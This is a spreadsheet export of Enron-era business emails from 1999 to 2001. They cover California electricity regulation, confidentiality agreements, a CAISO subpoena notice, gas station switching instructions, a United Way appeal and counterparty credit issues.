&gt; a subsequent "scoping memo" from the Commission should invite comment, and_x000D_
&gt; in particular should certainly not preclude, inclusion of retail solutions_x000D_
&gt; in the Commission's investigation of ways to provide relief for SDG&amp;E and_x000D_
to_x000D_
&gt; prevent recurrence of similar problems with the other utilities.  As is_x000D_
&gt; obvious from this comment, I think we have a real opportunity to both_x000D_
&gt; deflect attention from the so-called wholesale-generator piracy and_x000D_
increase_x000D_
&gt; retail opportunities for the Members in the context of this new OII._x000D_
&gt;_x000D_
&gt; The only direct, adverse commentary I heard was from a Utility Workers of_x000D_
&gt; America "representative" who advocated 1) for reregulation of the industry_x000D_
&gt; and 2) against TOU metering on the view that this would favor moneyed_x000D_
&gt; ratepayers over the others.  I think our colleagues (which by the way_x000D_
&gt; include the ORA after today) will find this disregard of conservation and_x000D_
&gt; DSM opportunities to be distasteful.  I also think the underlying interest_x000D_
&gt; in these comments is pretty transparent and believe it was not lost on the_x000D_
&gt; attendees._x000D_
&gt;_x000D_
&gt; Bottom line:  as we previously have discussed, this is an excellent time_x000D_
and_x000D_
&gt; opportunity for IEP to introduce itself to the community here, and_x000D_
statewide_x000D_
&gt; I suppose, as the voice of "electricity service providers" - which_x000D_
includes_x000D_
&gt; the entire range of QF projects, renewable technologies, cogeneration,_x000D_
&gt; conservation, ESPs and marketers and new generators which have already and_x000D_
&gt; are now poised to invest many hundreds of millions of dollars in_x000D_
California_x000D_
&gt; (to correct deficient and negligent investment in new infrastructure)._x000D_
&gt;_x000D_
&gt; I had a particularly enjoyable conversation with the AARP representative_x000D_
who_x000D_
&gt; well understood, and was mystified at, the failure of responsible parties_x000D_
&gt; (SDG&amp;E) to invest in new generation since it was "obvious" to all that_x000D_
such_x000D_
&gt; investments were necessary.  I'll summarize with the mere observation that_x000D_
&gt; the BRPU story was of great interest to her.  She, and again in my_x000D_
&gt; estimation most of the serious participants, also is aware that SDG&amp;E has_x000D_
&gt; failed to maintain the natural gas infrastructure necessary to support_x000D_
even_x000D_
&gt; the existing generation, let alone needed additions._x000D_
&gt;_x000D_
&gt; I look forward to discussing this with you in further detail.  As noted, I_x000D_
&gt; think IEP as the representative of the full range of new, old and_x000D_
interested_x000D_
&gt; non-utility electricity providers has a marvelous opportunity to take the_x000D_
&gt; helm.  I'll be returning to Sacramento on Thursday._x000D_
&gt;_x000D_
&gt; -Doug Kerner_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Eric Janssen for Doug Kerner_x000D_
&gt; Ellison Schneider &amp; Harris  LLP_x000D_
&gt; 2015 H Street_x000D_
&gt; Sacramento, CA  95814_x000D_
&gt; Phone: (916) 447-2166_x000D_
&gt; Fax: (916) 447-3512_x000D_
&gt; mailto:ericj@eslawfirm.com_x000D_
&gt;_x000D_
&gt; CONFIDENTIALITY NOTICE:  This communication and any accompanying_x000D_
document(s)_x000D_
&gt; are confidential and privileged.  They are intended for the sole use of_x000D_
the_x000D_
&gt; addressee.  If you receive this transmission in error, you are advised_x000D_
that_x000D_
&gt; any disclosure, copying, distribution, or the taking of any action in_x000D_
&gt; reliance upon the communication is strictly prohibited.  Moreover, any_x000D_
such_x000D_
&gt; inadvertent disclosure shall not compromise or waive the attorney-client_x000D_
&gt; privilege as to this communication or otherwise.  If you have received_x000D_
this_x000D_
&gt; communication in error, please contact the sender at the internet address_x000D_
&gt; indicated or by telephone at (916)447-2166. Thank you._x000D_
&gt;</t>
  </si>
  <si>
    <t>Fri, 10 Mar 2000 02:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'don.baldridge@enron.com'})</t>
  </si>
  <si>
    <t>Aera Confidentiality</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the letter agreement which extended the EE&amp;CC confidentiality _x000D_
agreement to our deal.  Please review and if it looks OK, print out on ENA _x000D_
letterhead two copies for execution.  I will need an original when it is _x000D_
executed._x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Jan 2001 05:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Weekly Offline Meeting - EB 2748 (Louise Kitchen)</t>
  </si>
  <si>
    <t>Participants: Greg Piper, Louise Kitchen, Andy Zipper, Rex Shelby, Jay Webb, _x000D_
Mark Taylor</t>
  </si>
  <si>
    <t>Tue, 20 Feb 2001 23:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mday@gmssr.com', 'richard.sanders@enron.com', 'gfergus@brobeck.com'})</t>
  </si>
  <si>
    <t>Subpoena Requiring March 5 Response</t>
  </si>
  <si>
    <t>Do we want to help Dynegy or do we want to file our usual letter asking for _x000D_
confidential treatment?_x000D_
---------------------- Forwarded by Mary Hain/HOU/ECT on 02/21/2001 07:58 AM _x000D_
---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Fuller, Don" &lt;DFuller@caiso.com&gt;@caiso.com&gt;                           _x000D_
02/20/2001 04:33 PM_x000D_
	_x000D_
_x000D_
Sent by: "Happ, Susan" &lt;SHapp@caiso.com&gt;_x000D_
To: ISO Market Participants _x000D_
&lt;IMCEAEX-_O=CAISO_OU=CORPORATE_CN=DISTRIBUTION+20LISTS_CN=ISO+20MARKET+20PARTI_x000D_
CIPANTS@caiso.com&gt;_x000D_
cc:  _x000D_
Subject: Subpoena Requiring March 5 Response_x000D_
_x000D_
_x000D_
To Market Participants and Scheduling Coordinators:_x000D_
_x000D_
The ISO received a subpoena requiring a response by March 5, from the_x000D_
Plaintiff in People of the State of California vs Dynegy Power Marketing,_x000D_
Inc., et al, a proceeding in the San Francisco Superior Court Civil_x000D_
Division.  The subpoena is attached.  The ISO intends to seek a protective_x000D_
order prior to disclosure of information subject to ISO tariff section_x000D_
20.3.2.  Market participants wishing to take steps to seek protections for_x000D_
confidential information in accordance with tariff section 20.3.4 should_x000D_
directly contact Mr. Patrick J. Coughlin, attorney for the Plaintiff, at_x000D_
415-288-4545 and notify Jeanne Sol, at jsole@caiso.com and Norma Formanek at_x000D_
&lt;mailto:nformanek@fbm.com&gt; nformanek@fbm.com._x000D_
Jeanne M. Sol,_x000D_
Regulatory Counsel_x000D_
California ISO_x000D_
(916) 608-7144_x000D_
_____________________________________________________________________________x000D_
________________________________________x000D_
_x000D_
The Foregoing e-Mail Communication (Together With Any Attachments Thereto)_x000D_
Is Intended For The Designated Recipient(s) Only. Its Terms May Be_x000D_
Confidential And Protected By Attorney/Client Privilege or Other Applicable_x000D_
Privileges.  Unauthorized Use, Dissemination, Distribution, Or Reproduction_x000D_
Of This Message Is Strictly Prohibited._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
 - Deposition Subpoena (2).pdf</t>
  </si>
  <si>
    <t>Fri, 15 Sep 2000 11:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Environmental Strategy Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks so much for the info.  This is very useful.  I will try to make the _x000D_
next meeting.  Hopefully the crisis out here will be over by then.  How would _x000D_
you structure it differently next time?_x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	Enron Energy Services_x000D_
	_x000D_
	From:  Stacey Bolton                           09/15/2000 03:38 PM_x000D_
	Phone No: 713-853-9916_x000D_
	_x000D_
_x000D_
_x000D_
_x000D_
To: Jeff Dasovich/SFO/EES@EES_x000D_
cc: Michael Terraso/OTS/Enron@ENRON, Jeffrey Keeler/Corp/Enron@ENRON, Mary _x000D_
Schoen/NA/Enron@Enron _x000D_
Subject: Re: Environmental Strategy Meeting  _x000D_
_x000D_
The meeting went well. There was a lot of discussion regarding the current _x000D_
deals involving the env. market.  ENA global markets presented their strategy _x000D_
on trading/marketing emissions as well as compliance outsourcing _x000D_
(comprehensive services related to emissions reductions.); EES talked about _x000D_
capturing bypassed emissions from current bundled deals as well as the _x000D_
challenges of doing retail in states w/ varying mandates &amp; reporting _x000D_
requirements; EES (Bruce Stram) talked a bit about dg;  ENA origination _x000D_
talked about a massive fuel cell project they are working on (they are _x000D_
keeping it confidential currently); ENA West Structuring talked about _x000D_
financial packages to offset intermittent risk assc. w/ wind; Michael Payne _x000D_
EWC talked about wind development in the states and the associated _x000D_
opportunities w/ renewable energy credits; New Power talked a bit about their _x000D_
rollout in NJ, PA and upcoming CA.  New Power is at a point where they need _x000D_
to get up on the curve w/ regard to renewable mandates and reporting _x000D_
standards._x000D_
_x000D_
Everyone seemed to agree that it makes sense for environmental strategies to _x000D_
act as the "link" between the groups w/ regard to env. market opportunities.  _x000D_
There are considerable synergies involved w/ ee, renewables, air emissions _x000D_
and technology control, and as we interface across the commercial groups, _x000D_
ensure that the left hand is talking to the right (i.e. the deals are _x000D_
capturing the most value and groups are aware of what others are working _x000D_
on.)  We are rolling out an intranet page where we intend to offer business _x000D_
intelligence and env. regulation info.  In the near term, I'll be circulating _x000D_
the presentations and the contact list.  There will be some sort of follow up _x000D_
meeting that is structured completely differently than this one._x000D_
_x000D_
Hope this is helpful.  Have a good weekend._x000D_
Stacey_x000D_
_x000D_
_x000D_
_x000D_
Jeff Dasovich_x000D_
09/15/2000 11:35 AM_x000D_
To: Stacey Bolton/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Re: Environmental Strategy Meeting  _x000D_
_x000D_
My apologies, but as you can imagine, California's little crisis has me a bit _x000D_
preoccupied.  Would love to know what comes out of the meeting, though._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 4 Sep 2001 11:37:37 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Original Email Returned</t>
  </si>
  <si>
    <t xml:space="preserve">This has been forwarded to the Gas Controllers.  _x000D_
Gas controls E:mail address _x000D_
_x000D_
 DL-ETSGasControllers@enron.com_x000D_
  no spaces _x000D_
 _x000D_
 _x000D_
From: 	"Franson, Rob" &lt;RFranson@czn.com&gt;@ENRON [mailto:IMCEANOTES-+22Franson+2C+20Rob+22+20+3CRFranson+40czn+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Tuesday, September 04, 2001 11:28 AM_x000D_
To:	Schoolcraft, Darrell_x000D_
Subject:	Original Email Returned_x000D_
_x000D_
_x000D_
Darrell:  Please forward to your controllers since the original email was returned.  Thanks. _x000D_
-----Original Message----- _x000D_
From:   Franson, Rob  _x000D_
Sent:   Friday, August 31, 2001 3:58 PM _x000D_
To:     'DL-ETS Gas' _x000D_
Cc:     Breen, Sean; Tucker, Tom; Snodgrass, Daniel; Conboy, Martin; Harp, George _x000D_
Subject:        Clarification on the remote operation of Citizens Owned "Griffith" Station _x000D_
As discussed on the phone, Citizens personnel have been working with Trigon Engineering on-site to better tune the station.  We would like to continue refinements and desire our field measurement technician Tommy Tucker to observe via Rocklink whenever the primary selection is switched.  Therefore until instructed otherwise, please call Tommy as soon as it is known that a switch will occur, giving him as much lead time to log in and observe. Therefore, be prepared to tell him the exact time the 1 or 2 will be entered._x000D_
His cell number is (928) 715-7004. _x000D_
If Tommy cannot be reached, go ahead and make the switch with one exception. _x000D_
Exception:  If the inlet pressure to the Citizens Owned Station is less that 575 psig on either pipeline, do not change the primary selection without permission.  Permission shall be requested by calling one of the following Citizens Employees.  Please attempt to call the person listed first, and only call the person listed second if you cannot reach the first person.   1- Tommy Tucker (928) 715-7004 2- Dan Snodgrass (928) 310-5080  3- Martin Conboy (928) 380-5777 or 4- Robert Franson (928) 853-6322._x000D_
TW-Gas Control, Please respond letting me know if this massage is clear. </t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 08:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tprice@gibsons.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Dan,_x000D_
_x000D_
This looks fine, so if you would like to have your people execute it and_x000D_
forward it to us, we will execute and close the loop._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Tammi_x000D_
_x000D_
-----Original Message-----_x000D_
From: Dan.J.Hyvl@enron.com [mailto:Dan.J.Hyvl@enron.com]_x000D_
Sent: Tuesday, April 10, 2001 10:52 AM_x000D_
To: Tammi Price_x000D_
Cc: Walter.Guidroz@enron.com_x000D_
Subject: Re: FW: Confidentiality Agreement Annual Report [Agreement]_x000D_
_x000D_
_x000D_
_x000D_
Attached please find a red-line and clean version of the Confidential_x000D_
Agreement we discussed this morning.  Please advise if the clean version is_x000D_
in order and I will have the Credit Group proceed with its execution and_x000D_
forwarding to Gibson._x000D_
_x000D_
(See attached file: 2001-004misc.doc)(See attached file: 2001-004amisc.doc)_x000D_
_x000D_
_x000D_
--_x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 Aug 2000 11:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.kinsey@enron.com', 'tom.acton@enron.com', 'steve.venturatos@enron.com', 'sylvia.campos@enron.com', 'ami.chokshi@enron.com', 'kristin.albrecht@enron.com', 'paula.lee@enron.com', 'mary.gosnell@enron.com', 'megan.parker@enron.com', 'gloria.barkowsky@enron.com', 'mary.solmonson@enron.com', 'sherry.anastas@enron.com', 'thomas.araujo@enron.com', 'edward.terry@enron.com', 'melba.lozano@enron.com', 'angel.fuller@enron.com', 'denver.plachy@enron.com', 'amy.horton@enron.com', 'isabel.resendez@enron.com', 'bill.hare@enron.com', 'irene.flynn@enron.com', 'cathy.sprowls@enron.com', 'samuel.schott@enron.com', 'natalie.baker@enron.com', 'charles.jacobs@enron.com', 'peter.berzins@enron.com', 'kevin.meredith@enron.com', 'kimberly.hundl@enron.com', 'bernice.rodriguez@enron.com', 'victoria.versen@enron.com', 'john.valdes@enron.com', 'lia.halstead@enron.com', 'amber.ebow@enron.com', 'sharen.cason@enron.com', 'rita.anderson@enron.com', 'brenda.fletcher@enron.com', 'jefferson.sorenson@enron.com', 'bridgette.anderson@enron.com', 'jeff.klotz@enron.com', 'scott.mills@enron.com', 'steve.jackson@enron.com', 'chris.mendoza@enron.com', 'christina.sanchez@enron.com', 'karen.lambert@enron.com', 'theresa.brogan@enron.com', 'chantelle.villanueva@enron.com', 'david.eubanks@enron.com', 'dawn.kenne@enron.com', 'rhonda.denton@enron.com', 'cassandra.moses@enron.com', 'brenda.everett@enron.com', 'lashanda.poledore@enron.com', 'jeff.royed@enron.com', 'maria.aguilera-peon@enron.com', 'kevin.bosse@enron.com', 'thresa.allen@enron.com', 'jennifer.bagwell@enron.com', 'robert.cotten@enron.com', 'susan.hadix@enron.com', 'diane.anderson@enron.com', 'charles.muzzy@enron.com', 'rebecca.ford@enron.com', 'gabriel.monroy@enron.com', 'katherine.kelly@enron.com', 'vivien.pham@enron.com', 'kelley.huntley@enron.com', 'jody.crook@enron.com', 'laurel.bolt@enron.com', 'stacie.guidry@enron.com', 'melissa.ratnala@enron.com', 'patti.sullivan@enron.com', 'mary.poorman@enron.com', 'katherine.benedict@enron.com', 'scott.tackett@enron.com', 'nick.moshou@enron.com', 'brandee.jackson@enron.com', 'beverly.beaty@enron.com', 'noel.petterson@enron.com', 'judy.walters@enron.com', 'kristie.youngblood@enron.com', 'brian.heinrich@enron.com', 'cathy.harris@enron.com', 'cyndie.balfour-flanagan@enron.com', 'thu.nguyen@enron.com', 'veronica.arriaga@enron.com', 'eric.tipp@enron.com', 'timothy.norton@enron.com', 'yolanda.ford@enron.com', 'michael.moscoso@enron.com', 'ron.gaskey@enron.com', 'audrey.cook@enron.com', 'bob.bowen@enron.com', 'bob.hall@enron.com', 'karie.hastings@enron.com', 'gregory.mausser@enron.com', 'kirk.lenart@enron.com', 'gregg.lenart@enron.com', 'jason.vogler@enron.com', 'kelly.lombardi@enron.com', 'john.postlethwaite@enron.com', 'lisa.peterson@enron.com', 'jackson.logan@enron.com', 'russ.severson@enron.com', 'sarah.smith@enron.com', 'lisa.csikos@enron.com', 'kelly.templeton@enron.com', 'larry.cash@enron.com', 'bryce.baxter@enron.com', 'mark.mccoy@enron.com', 'charlene.richmond@enron.com', 'lisa.hesse@enron.com', 'angela.henn@enron.com', 'kim.weldon@enron.com', 'jason.moore@enron.com', 'victor.lamadrid@enron.com', 'tiffany.williams@enron.com', 'diane.cook@enron.com', 'crystal.hyde@enron.com', 'stephanie.piwetz@enron.com', 'rebecca.griffin@enron.com', 'ana.rizvi@enron.com', 'margie.straight@enron.com', 'nick.hiemstra@enron.com', 'michael.walters@enron.com', 'kerri.thompson@enron.com', 'beatrice.reyna@enron.com', 'kathryn.bussell@enron.com', 'william.kasemervisz@enron.com', 'robert.lloyd@enron.com', 'juanita.marchand@enron.com', 'howard.camp@enron.com', 'joseph.koothrappaly@enron.com', 'avril.forster@enron.com', 'clarissa.garcia@enron.com', 'lisa.valderrama@enron.com', 'carrie.southard@enron.com', 'bob.klein@enron.com', 'keith.clark@enron.com', 'melissa.rodriguez@enron.com', 'trisha.hughes@enron.com', 'marlene.hilliard@enron.com', 'delma.salazar@enron.com', 'george.smith@enron.com', 'marlo.james@enron.com', 'joanie.ngo@enron.com', 'michael.taylor@enron.com', 'mitzie.scott@enron.com', 'jacqueline.adams@enron.com', 'joe.casas@enron.com', 'max.doner@enron.com', 'stacey.white@enron.com', 'evelyn.metoyer@enron.com', 'scott.loving@enron.com', 'david.maxwell@enron.com', 'tricia.bowen@enron.com', 'juana.fayett@enron.com', 'angela.barnett@enron.com', 'carrie.hollomon@enron.com', 'israel.estrada@enron.com', 'julie.boehl@enron.com', 'shona.wilson@enron.com', 'julie.meyers@enron.com', 'jenny.latham@enron.com', 'sheetal.patel@enron.com', 'gerri.gosnell@enron.com', 'chris.riegler@enron.com', 'eddie.janzen@enron.com', 'susan.harrison@enron.com', 'sabra.dinari@enron.com', 'susie.ayala@enron.com', 'john.weakly@enron.com', 'sheri.thomas@enron.com', 'kelly.summers@enron.com', 'hillary.mack@enron.com', 'mary.franklin@enron.com', 'anne.bike@enron.com', 'frank.davis@enron.com', 'heidi.withers@enron.com', 'sheila.glover@enron.com', 'molly.sumrow@enron.com', 'kyle.lilly@enron.com', 'kathleen.speer@enron.com', 'david.baumbach@enron.com', 'regina.perkins@enron.com', 'laurel.adams@enron.com', 'michelle.waldhauser@enron.com', 'cynthia.hakemack@enron.com', 'pat.clynes@enron.com', 'daniel.graham@enron.com', 'angie.zeman@enron.com', 'jeffrey.gossett@enron.com', 'jennifer.denny@enron.com', 'jolly.jose@enron.com', 'shawna.johnson@enron.com', 'pamela.sonnier@enron.com', 'shielah.castro@enron.com', 'kam.keiser@enron.com', 'demarco.carter@enron.com', 'michael.mousteiko@enron.com', 'hugh.eichelman@enron.com', 'jason.wolfe@enron.com', 'daniele.crelin@enron.com', 'wes.dempsey@enron.com', 'christopher.spears@enron.com', 'thomas.engel@enron.com', 'pam.boxx@enron.com', 'laura.dewett@enron.com', 'robert.cass@enron.com', 'cynthia.shoup@enron.com', 'willie.harrell@enron.com', 'gordon.heaney@enron.com', 'connie.sutton@enron.com', 'terri.harlan@enron.com', 'elizabeth.hernandez@enron.com', 'larry.hunter@enron.com', 'cora.pendergrass@enron.com', 'martha.stevens@enron.com', 'jeanne.wukasch@enron.com', 'shari.mao@enron.com', 'mark.mcclure@enron.com', 'stephanie.gomes@enron.com', 'darron.giron@enron.com', 'robert.superty@enron.com', 'anthony.campos@enron.com', 'kathryn.pallant@enron.com', 'jeanie.robins@enron.com', 'melba.bowen@enron.com', 'elizabeth.soto@enron.com', 'mary.smith@enron.com', 'alfonso.trabulsi@enron.com', 'darla.saucier@enron.com', 'clem.cernosek@enron.com', 'daniel.falcone@enron.com', 'lisa.shoemake@enron.com', 'lynn.tippery@enron.com', 'susan.elledge@enron.com', 'richard.mckeel@enron.com', 'kevin.drachenberg@enron.com', 'daren.farmer@enron.com', 'kim.theriot@enron.com', 'suzanne.christiansen@enron.com', 'stacey.brewer@enron.com', 'sherlyn.schumack@enron.com', 'nicole.vo@enron.com', 'willie.stewart@enron.com', 'christopher.hargett@enron.com', 'judy.hernandez@enron.com', 'leslie.robinson@enron.com', 'stella.morris@enron.com', 'wade.price@enron.com', 'michael.jacobson@enron.com', 'alvin.thompson@enron.com', 'carlos.rodriguez@enron.com', 'jackie.morgan@enron.com', 'cheryl.dudley@enron.com', 'lee.chance@enron.com', 'melissa.murphy@enron.com', 'dart.arnaez@enron.com', 'katherine.herrera@enron.com', 'tom.doukas@enron.com', 'marvia.jefferson@enron.com', 'bernard.dahanayake@enron.com', 'alton.honore@enron.com', 'kevin.brady@enron.com', 'debny.greenlee@enron.com', 'jean.bell@enron.com', 'victor.guggenheim@enron.com', 'ruby.kyser@enron.com', 'eugenio.perez@enron.com', 'maria.sandoval@enron.com', 'hannah.ortiz@enron.com', 'meredith.mitchell@enron.com', 'celeste.cisneros@enron.com', 'matt.motsinger@enron.com', 'carolyn.gilley@enron.com', 'kim.durham@enron.com', 'linda.ewing@enron.com', 'matthew.lippert@enron.com', 'torrey.moorer@enron.com', 'mary.ellenberger@enron.com', 'michael.eiben@enron.com', 'cecil.john@enron.com', 'phillip.love@enron.com', 'alex.saldana@enron.com', 'joy.werner@enron.com', 'julie.love@enron.com', 'jessica.white@enron.com', 'trang.le@enron.com', 'b.palmer@enron.com', 'brad.bangle@enron.com', 'vanessa.schulte@enron.com', 'kathy.moore@enron.com', 'mary.gray@enron.com', 'cindy.vachuska@enron.com', 'robin.rodrigue@enron.com', 'dale.neuner@enron.com', 'darren.espey@enron.com', 'william.kelly@enron.com', 'kimberly.olinger@enron.com', 'rahmaan.mwongozi@enron.com', 'ashley.carlson@enron.com', 'jana.morse@enron.com', 'joyce.kuo@enron.com', 'donna.consemiu@enron.com', 'jesse.villarreal@enron.com', 'gary.stadler@enron.com', 'aneela.charania@enron.com', 'dianne.swiber@enron.com', 'gary.nelson@enron.com', 'tina.valadez@enron.com', 'stacey.richardson@enron.com', "o'neal.winfree@enron.com", 'jennifer.blay@enron.com', 'paul.couvillon@enron.com', 'marilyn.colbert@enron.com', 'george.grant@enron.com', 'mary.marz@enron.com', 'faye.ellis@enron.com', 'souad.mahmassani@enron.com', 'kimberly.allen@enron.com', 'sandra.mcnichols@enron.com', 'gregory.steagall@enron.com', 'carrie.coldiron@enron.com', 'patti.thompson@enron.com', 'kristen.hanson@enron.com', 'donna.greif@enron.com', 'lisa.woods@enron.com', 'david.dupre@enron.com', 'rhonda.robinson@enron.com', 'jane.saladino@enron.com', 'anita.luong@enron.com', 'amelia.alland@enron.com', 'mark.thorne@enron.com', 'jennifer.nguyen@enron.com', 'heather.choate@enron.com', 'valerie.curtis@enron.com', 'lisa.cousino@enron.com', 'clara.carrington@enron.com', 'claudia.clark@enron.com', 'james.scribner@enron.com', 'leslie.smith@enron.com', 'diana.monaghan@enron.com', 'tara.sweitzer@enron.com', 'aimee.lannou@enron.com', 'yvette.connevey@enron.com', 'katrina.johnson@enron.com', 'patrick.ryder@enron.com', 'ana.correa@enron.com', 'cynthia.gin@enron.com', 'dan.houston@enron.com', 'jeff.westover@enron.com', 'fred.boas@enron.com', 'cathy.torre@enron.com', 'jon.lewis@enron.com', 'michael.benien@enron.com', 'derek.bailey@enron.com', 'chris.abel@enron.com', 'kellie.bilski@enron.com', 'mary.comello@enron.com', 'kimat.singla@enron.com', 'rebecca.grace@enron.com', 'rose.botello@enron.com', 'judy.barnes@enron.com', 'linda.bryan@enron.com', 'rosa.brown@enron.com', 'joann.collins@enron.com', 'julissa.marron@enron.com', 'jennifer.pattison@enron.com', 'andrea.guillen@enron.com', 'casey.evans@enron.com', 'robert.allwein@enron.com', 'elsie.lew@enron.com', 'randall.gay@enron.com', 'donnie.myers@enron.com', 'sabrae.zajac@enron.com', 'gregory.carraway@enron.com', 'corey.hollander@enron.com', 'jackie.young@enron.com', 'd.hall@enron.com', 'mark.schrab@enron.com', 'theresa.kotrla@enron.com', 'chris.walker@enron.com', 'janie.aguayo@enron.com', 'cecilia.olvera@enron.com', 'susan.trevino@enron.com', 'karen.lindley@enron.com', 'stephanie.sever@enron.com', 'jason.williams@enron.com', 'sandy.olitsky@enron.com', 'steve.gillespie@enron.com', 'rita.wynne@enron.com', 'tricia.truong@enron.com', 'adnan.patel@enron.com', 'joel.henenberg@enron.com', 'bruce.mills@enron.com', 'sayed.khoja@enron.com', 'karl.stewart@enron.com', 'alicia.perkins@enron.com', 'cynthia.franklin@enron.com', 'mechelle.stevens@enron.com', 'laurie.ellis@enron.com', 'leslie.reeves@enron.com', 'hunaid.engineer@enron.com'})</t>
  </si>
  <si>
    <t>Message from Sally Beck</t>
  </si>
  <si>
    <t xml:space="preserve">Two weeks ago I toured the Depelchin Center, one of the organizations that _x000D_
receives much of its funding from the United Way.  I was surprised to find _x000D_
out about the many programs that the center offers to neglected and abused  _x000D_
Houston children and  the caring adults who will open their homes as foster _x000D_
parents.  I had already completed my electronic pledge card before going to _x000D_
the center.  Learning about the important programs offered through Depelchin _x000D_
and meeting four year-old Jessica and ten year-old Steven who were _x000D_
temporarily housed there before going to foster homes made me very glad to _x000D_
have made that pledge.  _x000D_
_x000D_
Enron has a terrific matching program that allows all employees to receive _x000D_
matching funds for dollars that you may choose to give to non-profit _x000D_
organizations.  Hopefully, many of you take advantage of this to stretch your _x000D_
charitable giving during the year.  The United Way campaign is the one time _x000D_
each year that Enron invites employees to partner with the company to make a _x000D_
difference in the lives of so many in Houston.  Each dollar pledged by an _x000D_
employee is matched by Enron.  _x000D_
_x000D_
If you have not yet completed your electronic pledge, please consider doing _x000D_
so as soon as possible.  Our United Way campaign draws to its conclusion next _x000D_
Wednesday, August 23.  I hope that each one of you will consider making a _x000D_
pledge.  There is no gift that is too small, because cumulatively all Enron _x000D_
employees can make a significant positive impact for Houston.  Log on to _x000D_
http://unitedway.enron.com to complete your pledge card._x000D_
_x000D_
Thanks to the many of you who have already completed your electronic _x000D_
pledge.    </t>
  </si>
  <si>
    <t>Sat, 21 Apr 2001 18:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/22/01; HourAhead hour: 2;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/22/01; HourAhead hour: 2;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in Load schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042202.txt_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 2 / Preferred:   1.94 / Final:   1.91)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE4_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/22/01_x000D_
  SC_ID: EPMI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 26 Sep 2001 15:12:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'thenninger@mail.law.utexas.edu', 'nbrazzil@mail.law.tuexas.edu'})</t>
  </si>
  <si>
    <t>Friday Executive Committee Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Nancy and Tom, I received notice today that a company of which I am a director has scheduled a special board meeting for this Friday afternoon on the east coast.  I will be unable, therefore, to be in Austin for the Executive Committee Meeting.  Please convey my regrets and best wishes to those who attend.  All the best.  Jim </t>
  </si>
  <si>
    <t>Thu, 23 Aug 2001 12:50:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>ALCOA</t>
  </si>
  <si>
    <t>Tanya:_x000D_
_x000D_
You'll love this.  ALCOA has sent us an amendment to the ISDA (that was signed 1/99) and wants to amend the "threshold amount" in Part 1 so that it corresponds to the current credit rating of the applicable party as indicated in Paragraph 13.  I think we are mixing apples and oranges!  Obviously they didn't understand the difference when they signed the ISDA in '99.  And it's the same lawyer sending the amendment who negotiated the master._x000D_
_x000D_
Marie</t>
  </si>
  <si>
    <t>Tue, 9 Nov 1999 00:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Canadian Memo</t>
  </si>
  <si>
    <t xml:space="preserve">Peter:_x000D_
Are you handlig these matters or should we be involved?  Please call me or _x000D_
Sara when convenient.  Thanks._x000D_
Carol_x000D_
---------------------- Forwarded by Carol St Clair/HOU/ECT on 11/09/99 08:58 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  John Suttle                           11/08/99 04:54 PM_x000D_
	_x000D_
_x000D_
To: Sara Shackleton/HOU/ECT@ECT, Carol St Clair/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Canadian Memo_x000D_
_x000D_
Rob,_x000D_
_x000D_
The following is an update on the ongoing situations with some of the _x000D_
Canadian counterparties that have recently changed their corporate _x000D_
structures.  Clearly there are some issues that should be discussed regarding _x000D_
the approach Enron should take moving forward.  On some issues, we are at a _x000D_
point that decisions need to be made on whether or not to begin exercising _x000D_
our contractual rights.  Other issues remain to be resolved within Credit, _x000D_
and I expect these to be resolved within the next week._x000D_
_x000D_
Please call me to discuss any questions you might have with the following. _x000D_
_x000D_
1) Dominion Energy Inc. acquired Remington Energy Ltd. in April 1999.  _x000D_
Remington operates as a wholly owned subsidiary under Dominion Energy Inc. _x000D_
and has a Master Physical under which its deals have been confirmed.  It has _x000D_
failed on each of the financial MAC covenants in the contract.  Repeated _x000D_
efforts have been made to obtain a parent guaranty from Dominion including _x000D_
conversations that have taken place with both commercial and credit _x000D_
contacts.  Nonetheless, the counterparty to date has been unresponsive to _x000D_
guaranty inquiries.  In the past few weeks, repeated phone calls to our _x000D_
Dominion contacts have not been returned.  Current mark-to-market exposure _x000D_
for Remington is approximately $9MM USD.  _x000D_
_x000D_
2) Marathon Canada Ltd., a wholly owned sub of Marathon Oil Company (BBB-), _x000D_
